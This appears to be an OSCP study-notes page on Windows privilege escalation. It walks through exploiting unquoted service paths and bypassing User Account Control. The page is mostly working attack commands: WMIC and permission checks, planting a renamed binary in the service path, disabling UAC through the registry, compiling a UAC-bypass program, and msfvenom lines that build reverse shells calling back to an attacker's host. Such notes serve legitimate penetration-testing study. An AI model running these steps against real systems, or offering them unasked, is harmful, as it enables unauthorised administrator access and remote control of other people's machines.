OSCP Notes
Comment on page

Unquoted path Manual Exploitation

C:\Program Files directory, which contains a space character in its name.
Finding the correct binary path is possible Under services in Winpeas.
Also you can list the services with
net start
wmic service list brief
sc query
Services - Unquoted Paths
Path to service is unquoted and has spaces.
Running with LocalSystem or equivalent Administrative permissions.
User should have write permissions to a folder in the path.
User should have permission to start the service OR the service auto-restarts on shutdown/start-up.
Find unquoted paths with WMIC:
Find all services with "auto" start mode (automatically starts at system start-up),
cmd> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Exploit steps:
Find unquoted service binpaths, for services run as ADMIN e.g. binpath= C:\Program Files\A bad folder\adminservice.exe.
Check if you have FULL/WRITE (F)(W) permissions along path using:
a) icacls "C:\Program Files\folder\A unquoted folder\adminservice.exe"
b) accesschk.exe -ucqv [/path/to/unquoted/folder] -accepteula
Generate reverse shell payload and rename to path e.g. A.exe.
Place malicious binary in path, so that it is executed e.g. move A.exe "C:\Program Files\folder".
Execute by restarting computer (if service has startmode = auto) with shutdown /r /t 0.
User Account Control (UAC) Bypass
Even if you are a local admin, User Account Control (UAC) maybe turned on which may force your user to respond to UAC credential/consent prompts in order to perform privileged actions.
UAC bypass walkthrough: https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
STEP 1: Check if we should perform UAC bypass
cmd> whoami /priv # do we have very few privileges even as local admin?
cmd> whoami /groups # is "Mandatgory Label\XXX Mandatory Level" set to MEDIUM?
cmd> psexec.exe -i -accepteula -d -s rshell.exe # are we getting issues running psexec as SYSTEM?
# check if UAC turned on
cmd> reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1 # if 0x1 = UAC ENABLED
ConsentPromptBehaviorAdmin REG_DWORD 0x5 # if NOT 0x0 = consent required
PromptOnSecureDesktop REG_DWORD 0x1 # if 0x1 = Force all credential/consent prompts
# try to disable UAC
cmd> reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD
STEP 2: Prepare exploits
# modify uac-bypass.c to execute reverse shell
# compile w/ correct architecture
$ x86_64-w64-mingw32-gcc ~/OSCP-2022/Tools/privesc-windows/uac-bypass.c -o uac-bypass.exe
# generate reverse shell payload
$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=[kali] LPORT=666 -f exe -o rshell.exe
STEP 3: Transfer, setup listener and exec payload
cmd> copy \\[kali]\[share]\uac-bypass.exe uac-bypass.exe
cmd> copy \\[kali]\[share]\rshell.exe rshell.exe
cmd> .\uac-bypass.exe
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > program.exe